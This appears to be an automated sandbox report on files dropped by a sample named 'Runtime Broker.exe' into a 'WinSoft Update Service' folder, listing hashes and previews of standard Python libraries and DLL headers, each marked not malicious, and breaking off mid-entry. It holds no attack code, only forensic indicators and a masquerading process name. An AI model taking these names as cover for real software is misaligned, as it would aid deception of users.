Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	79875
Entropy (8bit):	4.471392678307344
Encrypted:	false
SSDEEP:	1536:rBmbNjGt9HIcay/eW59vKxYhP8nJk4XY4QcvAZfmx7tP1QKBW6cxQuXSN:rBmbNjGt9HIRses9vKmhUnG4o4bvAZfA
MD5:	F3B2FF173EA49101D75F8FB0CB230054
SHA1:	9016098CD1D7D1CF5B6FA1A5B954F205368EDAC7
SHA-256:	FB4466BAB237D5780068DDB45828B4CEB72EA1AB7DD27340EF4FFAC86971D8F5
SHA-512:	7B973549E1FBEA3B47984F53E7AE903320E051B401802D3E875B1F15F5838EB90CD541CDD707A6EC7A2928DC14E6BBAA46D0E2D6DBDDD27349DEFAF9B79FD95B
Malicious:	false
Preview:	# Copyright 2007 Google Inc..# Licensed to PSF under a Contributor Agreement..."""A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks..."""..from __future__ import unicode_literals...import itertools.import struct..__version__ = '1.0.23'..# Compatibility functions._compat_int_types = (int,).try:. _compat_int_types = (int, long).except NameError:. pass.try:. _compat_str = unicode.except NameError:. _compat_str = str. assert bytes != str.if b'\0'[0] == 0: # Python 3 semantics. def _compat_bytes_to_byte_vals(byt):. return byt.else:. def _compat_bytes_to_byte_vals(byt):. return [struct.unpack(b'!B', b)[0] for b in byt].try:. _compat_int_from_byte_vals = int.from_bytes.except AttributeError:. def _compat_int_from_byte_vals(bytvals, endianess):. assert endianess == 'big'. res = 0. for bv in bytvals:. assert isinstance(bv, _c

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\pyparsing.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	273394
Entropy (8bit):	4.547599592675191
Encrypted:	false
SSDEEP:	6144:P1XX3zksB7IUTeLTkOSiTZEsO1yZYJH698oHjmpvbY5c0XAJJrMPxlQncYPcD6aR:9tgacJJ
MD5:	6D253DDA76B61466E1DFD53DD99D8EE0
SHA1:	D6247DC94C399ADDF824220368994504C47E1D00
SHA-256:	2756F8CF74BF2B0C895BB84A1A7A0DFA15D6F6980C23320FE904E1C98E7226AE
SHA-512:	C7702D39AC5E88C9BE00860BB9BCB5B709FAC8DE5BF024148E60F2099B9FE6EAC6C86A58B9C1A71B52E92542FE01788EACEE5C0B9EF100AB40DF10EED07FF96F
Malicious:	false
Preview:	# -- coding: utf-8 --.# module pyparsing.py.#.# Copyright (c) 2003-2019 Paul T. McGuire.#.# Permission is hereby granted, free of charge, to any person obtaining.# a copy of this software and associated documentation files (the.# "Software"), to deal in the Software without restriction, including.# without limitation the rights to use, copy, modify, merge, publish,.# distribute, sublicense, and/or sell copies of the Software, and to.# permit persons to whom the Software is furnished to do so, subject to.# the following conditions:.#.# The above copyright notice and this permission notice shall be.# included in all copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER I

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\retrying.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9972
Entropy (8bit):	4.4528003334167865
Encrypted:	false
SSDEEP:	192:FPHHBoMWnoyId6JIqjFN0RiI6BpoGFI+g1NT0v5EBO:FPBoMWnrMQP
MD5:	CBD5A04C5A86C6EF24044016598226B6
SHA1:	3CF2CDEED9C6FBA5C6B373FBE2C9F2FB13845516
SHA-256:	9377DF95FE7F326D17708258841ED38F7E1BA8208F8540E461BC7536F5B614F1
SHA-512:	19EAE10548966ED61E4F5278C4D9AD8C53F2E95227FC119922C23900AF5571DB5749A5480AF7E60119D7D48910E07D09A63F1CAFAEBCEDC43F4658E206780064
Malicious:	false
Preview:	## Copyright 2013-2014 Ray Holder.##.## Licensed under the Apache License, Version 2.0 (the "License");.## you may not use this file except in compliance with the License..## You may obtain a copy of the License at.##.## http://www.apache.org/licenses/LICENSE-2.0.##.## Unless required by applicable law or agreed to in writing, software.## distributed under the License is distributed on an "AS IS" BASIS,.## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..## See the License for the specific language governing permissions and.## limitations under the License...import random.from pip._vendor import six.import sys.import time.import traceback...# sys.maxint / 2, since Python 3.2 doesn't have a sys.maxint....MAX_WAIT = 1073741823...def retry(dargs, dkw):. """. Decorator function that instantiates the Retrying object. @param dargs: positional arguments passed to Retrying object. @param **dkw: keyword arguments passed to the Retrying object. """.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\six.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	34159
Entropy (8bit):	4.775691189920932
Encrypted:	false
SSDEEP:	768:ESesVpKbIy/KiYG8Bll2bCx9m+E55VKzlM:teApKbIy/Kip8VO5yG
MD5:	6FC5317A32D2603139A0229C1876FFDF
SHA1:	0DFEC0D1D49F12B6B529D6ED1827D9BB00E30C34
SHA-256:	53867FCAFE77E16E423728D8F62F15D4E5D8D928C09F2F32D8BE6F0CB8614E13
SHA-512:	E70A32609C6EBA33077A569C9A24D11EA0F6ACF05C1DA468E8B4D13751F3D9C1AC0FF74CF6D2138DC5FB23534D2240572C1DF580982F7C8E78C1463BC9C5107A
Malicious:	false
Preview:	# Copyright (c) 2010-2020 Benjamin Peterson.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.#.# The above copyright notice and this permission notice shall be included in all.# copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISI

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\vendor.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	437
Entropy (8bit):	4.711088342734747
Encrypted:	false
SSDEEP:	12:8dQZ5x6QjkLW9Sewvhz8XCpoceV97Zm+k/oi/k2n:8y508lBVCpoceVxIoi/kS
MD5:	CEE69F6A3F761CB3A5C36E662B4424A2
SHA1:	370119BE8341A74DA25F1D791248C866328F2D9B
SHA-256:	32A627D3CCC4BE1EC80271493A0CCD7333F83C4973A49A37B57E458F840E6398
SHA-512:	15406C272EB592E5B23678D1F00C8140D47F2626D4F1D1F984906644DA394942F7D627018C0159B9430618C2F94B0FCE41D6F9DB2A7C34FC6F03D40463B6A7CC
Malicious:	false
Preview:	appdirs==1.4.4.CacheControl==0.12.6.colorama==0.4.4.contextlib2==0.6.0.post1.distlib==0.3.1.distro==1.5.0.html5lib==1.1.ipaddress==1.0.23 # Only needed on 2.6 and 2.7.msgpack==1.0.0.packaging==20.8.pep517==0.9.1.progress==1.5.pyparsing==2.4.7.requests==2.25.0. certifi==2020.11.08. chardet==3.0.4. idna==2.10. urllib3==1.26.2.resolvelib==0.5.3.retrying==1.3.3.setuptools==44.0.0.six==1.15.0.toml==0.10.2.webencodings==0.5.1.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pythoncom.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	magic text file for file(1) cmd, ASCII text
Category:	dropped
Size (bytes):	138
Entropy (8bit):	4.649845624570034
Encrypted:	false
SSDEEP:	3:SZ+FlJQcZ6MRxJjZuXyDeEeOnoQjDcVVfGg9n:SZ+FTQcIMjg3OnxX1g9n
MD5:	21536E5C77D37B70A33376BB03551CFD
SHA1:	6C417DAA1FED5C52F6DFD9B002351A3A64B03781
SHA-256:	08246CBB09A1E229E8BAAAA6F86070CB229FBCFC2A83B517B51D5ED412C4CE81
SHA-512:	979397A7A55B183310CE86028984FBEE162618BFF9A7BB4996EA46789718C6C8B54613DE07A110D47E08FDB9E84A20597AB41006CE2169E37B398025EA5048FB
Malicious:	false
Preview:	# Magic utility that "redirects" to pythoncomxx.dll.import pywintypes.pywintypes.__import_pywin32_system_module__("pythoncom", globals()).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pywin32.pth Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	178
Entropy (8bit):	4.536641638598185
Encrypted:	false
SSDEEP:	3:SgOFQFU7MLWmP/t1IQbT0+MetmY28eRNTFR23LOeNCEndDpkXEF:SgOOFBVP/H7H0+MeZpcF+KeNCEnmEF
MD5:	322BF8D4899FB978D3FAC34DE1E476BB
SHA1:	467808263E26B4349A1FAF6177B007967FBC6693
SHA-256:	4F67FF92AF0EA38BF18AC308EFD976F781D84E56F579C603ED1E8F0C69A17F8D
SHA-512:	D7264690D653AC6ED4B3D35BB22B963AFC53609A9D14187A4E0027528B618C224ED38E225330CEAE2565731A4E694A6146B3214B3DCEE75B053C8AE79F24A9DD
Malicious:	false
Preview:	# .pth file for the PyWin32 extensions.win32.win32\lib.Pythonwin.# And some hackery to deal with environments where the post_install script.# isn't run..import pywin32_bootstrap.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pywin32.version.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	1.9219280948873623
Encrypted:	false
SSDEEP:	3:SCv:Ss
MD5:	CDE46522D7B9A40AC01F9361ACD4A90D
SHA1:	BB8AAAC8611A3FA9FF4967877047846F11B680B8
SHA-256:	791F66B6A07D13AF8AF2F243438E6A14BC0C8446987BB603255786E361DCF2F5
SHA-512:	1196D94E8AFA82FE9E22BDDC1FE72A80C19BDBE6A5D71B7864512FEFBF4F8DAC72A8AF348B680F25005940DF866165949BE5D5C1B0491A42E05C180949D53B87
Malicious:	false
Preview:	300..

C:\Program Files (x86)\WinSoft Update Service\_asyncio.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53776
Entropy (8bit):	6.3655184702889125
Encrypted:	false
SSDEEP:	768:pZBeDHX3venoZD6cWPEbkUoBNznkaOGyAqSupI8snpG/bDWDG4yGo:jBmHX3vlZDBWUkbQatpYpI8snp7yh
MD5:	1892DB696D94926AA0F13874F33F3637
SHA1:	3474F9E3CADE53FDFC29D755357E554A5A15E0C2
SHA-256:	6C31E51A193E689297470F00A6F6B10285426828FEE300F78BDC283B921F6059
SHA-512:	D26E15A84364A4CFB882A97B871FB6B23EBF104731DD51066CE2E9AB03118019B775E6F2BE01C5747D104ECF3144B8CDCEC4029CB504CEE470A7670BF7512DFE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W...9...9...9......9...8...9...:...9...<...9...=...9.U.8...9..8...9...8..9.U.1...9.U.9...9.U.....9.U.;...9.Rich..9.........................PE..L...0.:_...........!.....T...d.......U.......p............................................@............................P... ...d....................................}..T...........................8~..@............p...............................text...\S.......T.................. ..`.rdata.......p... ...X..............@..@.data...t(.......&...x..............@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_bz2.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	78352
Entropy (8bit):	6.573806249816513
Encrypted:	false
SSDEEP:	1536:3WdOR0H3HbILomue8YsAgU8kQbDZTaKFq8WlLGa6vsuXNy+WIBBN/hUcIg3f5BkG:7ebIfoZpxbVDOgTxRI84VRtG5v
MD5:	1C52BA084A3723940C0778AB5186893A
SHA1:	5150A800F217562490E25DD74D9EEAD992E10B2D
SHA-256:	CB008E0A6C65DDB5F20AB96E65285DEE874468DF203FAEAFCA5E9B4A9F2918DC
SHA-512:	B397508607A1C7CCEF88C6A941398F78BA4F97CF8A32F40764673DB34C20EEA61364148260D87014348613EB07E959A043B505702437E33927249899BF4522B3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w.L.w.L.w.L..EL.w.L.).M.w.L"..L.w.L.).M.w.L.).M.w.L.).M.w.L.).M.w.L...M.w.L.w.L.w.L.).M.w.L.).M.w.L.))L.w.L.).M.w.LRich.w.L................PE..L...G.:_...........!.........N......g........................................P......j.....@.............................H............0.......................@..........T...........................H...@...............l............................text...d........................... ..`.rdata..$(.......*..................@..@.data...H...........................@....gfids....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_ctypes.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	104976
Entropy (8bit):	6.530545672144021
Encrypted:	false
SSDEEP:	1536:KrejvexLbjA6lhs6rRetzJl/CzRr3oJ91GK8v8cPvZkLkB/EMsWcb2CbPxIdI8V2:KrG8fA6/S1GK8UcZ/TsW+2RdI8VPNvU
MD5:	10861D3FA19D7DC3B41EB6F837340782
SHA1:	B258D223B444AB994EC2FEC95ACAA9F82DC3938C
SHA-256:	6255BAB0B7F3E2209A9C8B89A3E1EC1BBC7A29849A18E70C0CF582A63C90BED1
SHA-512:	EC83134C9BCE9CEDEEE8EBDB8E382FB7F944A7BC9D3BB47C7E3144EF2EF95114A36AC1CC8C0D52F434EE4C359D938A2D7C035E699C4407DF728E200DE7DA4AF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qf..5...5...5...<.j.3....Y..7....Y..3....Y..?....Y..>...Y..7...no..4...no..2...5.......Y..<...Y..4...Y..4...Y..4...Rich5...........................PE..L...7.:_...........!................................................................}.....@..........................3......t4......................................./..T...........................H0..@...............x............................text...4........................... ..`.rdata..nJ.......L..................@..@.data...p....P.......>..............@....gfids.......p.......X..............@..@.rsrc................Z..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_decimal.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	218640
Entropy (8bit):	6.788259121874902
Encrypted:	false
SSDEEP:	6144:EywZHnnt9Qs/EQh/XVsh3ZpDlqHbh3dbWVg11O0:Eyw5nnks/EqXVApQr9
MD5:	5596249B64C074374EAA1D4084E336C3
SHA1:	3748F6FF018C50913379B562E776F739E2A25A1F
SHA-256:	673BD4CACF3B5F8DA67C9C84E03E238961CA98683483DE78D0A6410200F7ABA6
SHA-512:	075438583BE8C186402BBFDC2EBB931F849D774D808ADE6DDEB55E1EA86646824560F1C981E859B55E71192F2D7E349CA967D61DDA0F3BD8081B329D2821C3F9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YU~I.4...4...4...L...4..&j...4..&j...4..&j...4..&j...4...j...4..F\...4...4...4...j...4...j...4...j...4...j...4..Rich.4..........................PE..L...6.:_...........!.....h...........j.......................................p......7[....@.........................@...P............@...............<.......P..H...P...T...............................@............................................text....f.......h.................. ..`.rdata..`8.......:...l..............@..@.data...pj.......h..................@....gfids.......0......................@..@.rsrc........@......................@..@.reloc..H....P... ..................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_elementtree.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	163344
Entropy (8bit):	6.648537488183864
Encrypted:	false
SSDEEP:	3072:XRuFEzTOS+rQDt/qSbm1kbx0XMfEBqR24l6EhI8Af3usfsT:6rYMebxQM7Hl6E8kT
MD5:	390552274C5F71C7EBD1F343BB74446C
SHA1:	E6285B1B7BB06126F9E61791175FACCA21C03FEC
SHA-256:	D6C7EA93CDEFE1973239A3DEC0F49A1027E943F1DE07E21FF378978CC6A438BC
SHA-512:	E2135848220F3D9FF36023B2121B6E7B52224FCAFDF260530ADE96A788F2F2A11A7179AE59986EB7F6E850C829CB8CED600E25A788344FA72E07773429FA1B43
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ..r ... ...!... ...!... ...!... ...!... ...!... ...!... ... /.. ...!... ...!... ... ... ...!... Rich... ........................PE..L...:.:_...........!................x.....................................................@.........................@'..X....'.......p.. ............d..............P#..T............................#..@...............p............................text............................... ..`.rdata...G.......H..................@..@.data........@.......*..............@....gfids.......`.......8..............@..@.rsrc... ....p.......:..............@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_hashlib.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32272
Entropy (8bit):	6.427179434799816
Encrypted:	false
SSDEEP:	768:ulrY1jLpG2SE1IdkZoS5ZCOWSpI8sIvHuIWDG4yHo:ulr8jL42SEqdkZ/5ZCtSpI8sIfuFyI
MD5:	4F51ED287BBAE386090A9BCC3531B2B8
SHA1:	26BD991AE8C86B6535BB618C2D20069F6D98E446
SHA-256:	5B6DA4B43C258B459159C4FBC7AD3521B387C377C058FE77AD74BA000606D72E
SHA-512:	2EB2CCD8E9C333B5179CF8F9FD8520CB3D025E23A10DCA3922E28521CFB9A38F9DD95F5D4F2784643EED08925D9008E5238FF9F93BDD39EE55414131186EDFF8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Q./l?./l?./l?.&...-l?..2>.-l?..2<..l?..2:.%l?..2;.$l?.2>.-l?.t.>.-l?..>.,l?./l>.yl?.27..l?.2?..l?.2...l?.2=..l?.Rich/l?.................PE..L...C.:_...........!.....,...8.......,.......@......................................61....@..........................L..P....L..x....................d...............H..T............................I..@............@..l............................text...L*.......,.................. ..`.rdata..<....@.......0..............@..@.data...P....`.......H..............@....gfids.......p.......P..............@..@.rsrc................R..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_lzma.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	146960
Entropy (8bit):	6.957798612342108
Encrypted:	false
SSDEEP:	3072:2ucUmMZzNadBMQmJImucXIcX/7jX18XgR75Wq4qs8s18Ru9mNosX6AYp+HfERI8z:1rvmK/7jX1GMuYOBAY8sB
MD5:	F91A9F1F2EFEE2F5DBAE42EA5D5D7153
SHA1:	2575CC77B51CB080FCEED9810A9F4B2903AE1384
SHA-256:	1F82BB06C79B6B392C92CAD87FFA736377FA25CD6D10DA8D61441D42C0D0101E
SHA-512:	DF1DFB8C8CEE3496A60EEEB6F0D3FE48E1DE8AF5D04667F9A3124B769E8EDD886CC46E6E4D4B277EE5D30F9F70F6F8C755097DDD996573A6817A5BB335DE919F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..E...E...E......E...D...E...F...E...@...E...A...E.1.D...E...D...E...D...E.1.M...E.1.E...E.1.....E.1.G...E.Rich..E.........PE..L...V.:_...........!.....r..........Js.......................................`............@.............................L.......x....@...............$.......P..D.......T...............................@...............d............................text...fq.......r.................. ..`.rdata...}.......~...v..............@..@.data...............................@....gfids.......0......................@..@.rsrc........@......................@..@.reloc..D....P......................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_msi.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33296
Entropy (8bit):	6.357307138240337
Encrypted:	false
SSDEEP:	768:FaJwrFQhKKYlJk1ql24KaC8xoUAIpd+o7uMaUiQvbFRI84Gc9q28WDG4y7:FaJHYXk1ql24KaCciQTFRI84Gc9q2Zy7
MD5:	9D4753FB6BA3AE705F26DEDAB20208D5
SHA1:	E735D7956BE0C653574FFA6B58924FB417699884
SHA-256:	9213BB4B368C9EF1D8A618086740D291C53D3FE6E961CD0CBE46EF9D31F18710
SHA-512:	749738DCDD2408633CF599B511DBB72590D17C8B177E81D234B763C13F281E9B7F62C5E7A4C95656034ECA7A4316D0E442728C7BE28AB9EC25684BBDB58C19F2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mc...0...0...0..0...0...1...0...1...0...1...0...1...0;..1...0...1...0...0...0;..1...0;..1...0;..0...0;..1...0Rich...0................PE..L...9.:_...........!.....,...<.......-.......@......................................%.....@.........................`R..H....R.......................h...............N..T............................N..@............@...............................text....*.......,.................. ..`.rdata..R....@.......0..............@..@.data........`.......N..............@....gfids.......p.......T..............@..@.rsrc................V..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_multiprocessing.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25616
Entropy (8bit):	6.307253811483999
Encrypted:	false
SSDEEP:	384:zqfCIsQpmteNeuAI6kOyjVdEUlTlspcq9JZ5I8kBLdnYPLxDG4y8i0f:zaTsZeNkkZjflBip9b5I8ktdWDG4y6
MD5:	05AB494CF791A50E4F8D2FFE1D3E1F3C
SHA1:	BB10CB1547CA996575000424026D88D095CB14B4
SHA-256:	4959342924E22B6A16EBC5C1ED39552E981515401EDA770E4AC87FD12ACF53F8
SHA-512:	0D0608B152482CB6E33C1ECE40AE8F00FF5360750627494AD5268C90C74DA22984B468674D2E959FAE098615761C1BE00E84862EF7B489C276345AA8292F2CA7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'S..c2.c2.c2.jJv.a2.Xl.a2.Xl.b2.Xl..h2.Xl.h2..l.a2.8Z.f2.c2.,2..l.a2..l.b2..l..b2..l.b2.Richc2.................PE..L...8.:_...........!.........................0............................................@.........................p9..`....9..x....p..(............J...............5..T............................5..@............0..P............................text...l........................... ..`.rdata.......0....... ..............@..@.data... ....P.......4..............@....gfids.......`.......8..............@..@.rsrc...(....p.......:..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_overlapped.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35856
Entropy (8bit):	6.411826184015306
Encrypted:	false
SSDEEP:	768:efHpnzcgRUaB8IaKkAvgRAKyiXlAtJYRIYvVI8Jt5rKzWDG4yH:UpzRUaB8IPkQwLy2l06rVI8Jt5JyH
MD5:	62F83812C33085D76D4A5D256EAAD5E8
SHA1:	1B5EE31498B5EBC70C1C725D20601E69770B7803
SHA-256:	9BF024DD389D88F3C6FB0E740AE123EF0E871730F1093705AB108A2D959E76F2
SHA-512:	31F76FB76B4F040F8B1FBD0EB862833AAD422FF631A571C3A74E2EABEACB1281491FDE2DC9E51ED74445EDB615F4508F588D8498FCF3F713D4DFF3B5447C2AE8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i...-.q.-.q.-.q.$...).q...p./.q...r.,.q...t.'.q...u.&.q...p./.q.v.w.,.q.v.p.(.q.-.p.H.q...y.,.q...q.,.q.....,.q...s.,.q.Rich-.q.........................PE..L...;.:_...........!.....2...@.......3.......P......................................1.....@.........................`\..X....\.......................r..............pX..T............................X..@............P...............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data........p.......N..............@....gfids...............\..............@..@.rsrc................^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_queue.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24592
Entropy (8bit):	6.35292645491841
Encrypted:	false
SSDEEP:	768:ziqdTY0pFAk5DYvOWJ6rndI8qUKWDG4yz:eqdTY0okRYvt4ndI8qU/yz
MD5:	234F63AE981F5A8E87DBABDA8CEEA32A
SHA1:	528EA2CF3D7622AA9BF9C038C91DF4E369C9924A
SHA-256:	3E1304AFDCD900748F62D15F93005E65457B9466454E322D065852603C510AC8
SHA-512:	A7308FCDAE88EFC2F7BDB9AC98350FC50E63B4807F3B1F98F07B789B22D56EEA7BFBAF7CB43886542D0B3C7DD8882D0107AD40081220765A5003635A4CF3C678
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W...9..9..9....9..8..9..:..9..<..9..=..9...8..9...8..9..8..9...1..9...9..9......9...;..9.Rich..9.................PE..L...;.:_...........!.........,...............0......................................8.....@.........................p6..L....6..d....`...............F.......p.......2..T............................2..@............0...............................text...l........................... ..`.rdata..\|....0......................@..@.data........@.......,..............@....gfids.......P.......4..............@..@.rsrc........`.......6..............@..@.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_socket.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66064
Entropy (8bit):	6.549494681327337
Encrypted:	false
SSDEEP:	1536:V4LIvOr2n5nHJHeSvSkuMebGmuDJ8hk+sAOOdI8VwzJyM:V40Or2n5pN8bGlDJ8hkFAOOdI8Vwp
MD5:	B3AF79BBFD7D5C5285660819792A3A9C
SHA1:	1FA470B280AB5751889EAA7BDB7BA37FF1270A06
SHA-256:	EB6132B253C40D7C3E00B2BBB392A1573075F8BBC0B2D59E2B077D2CFE8B028C
SHA-512:	DAC7DA4CD493C0753D477DA222C9B1E8C2486A4B6587C7CEA45661192F2D51316B6E6F3951FFBBCB83952E51AB61CC79326BEACB3D5E8637D13F2831E093F124
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K.zX.u...u...u.......u..4+...u..4+...u..4+...u..4+...u...+...u..T....u...u...u...+...u...+...u...+...u...+...u..Rich.u..........................PE..L...D.:_...........!.....j...~......Pl....................................... ............@.............................P...`...x...................................0...T...............................@............................................text....i.......j.................. ..`.rdata...*.......,...n..............@..@.data...x5.......2..................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_sqlite3.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	65552
Entropy (8bit):	6.488208820143906
Encrypted:	false
SSDEEP:	1536:EPBDZd1nSvgizd9EhT5EBShO69+MpekZn+LneKG0nz9AspI8sQWryDn:uj7izHm9n+LneKPz9AspI8sQWo
MD5:	218DA11C9B2295D5C645ECB7629CD44D
SHA1:	0E3337A9D9AC67D214F7C2067B21002A8A3D158D
SHA-256:	5987B2FCCA0698710F3572F222A6AEF3EFD9A6A32C002A11DD33C816BD9B58D8
SHA-512:	0FFB6DFA22ACF3E459D47BFD2E0A979D1AF6A577B9AC44E9B81F6E85A01EBE0DD33E436621BD355B145E05FBDEA504F7040D14F539277D8BF2C354968885CD46
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}.lO..?O..?O..?Fd5?I..?tB.>M..?.a?N..?tB.>M..?tB.>D..?tB.>D..?.B.>J..?.t.>M..?O..?...?.B.>F..?.B.>N..?.BY?N..?.B.>N..?RichO..?........PE..L...Q.:_...........!.....z...l......nz....................................... ......w.....@.............................P..............................................T...............................@...............p............................text....x.......z.................. ..`.rdata...9.......:...~..............@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_ssl.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	100880
Entropy (8bit):	6.5665910578271935
Encrypted:	false
SSDEEP:	3072:atBxnLabUtEgmZOVyoD2Zpc8fQRI847oQY:aRneiEgmZOVyogpc8fQx
MD5:	2825BAE93CD459D835B74892C9BD80DB
SHA1:	C7AB0C88489E5EB8E920EBC9871C969768BD4739
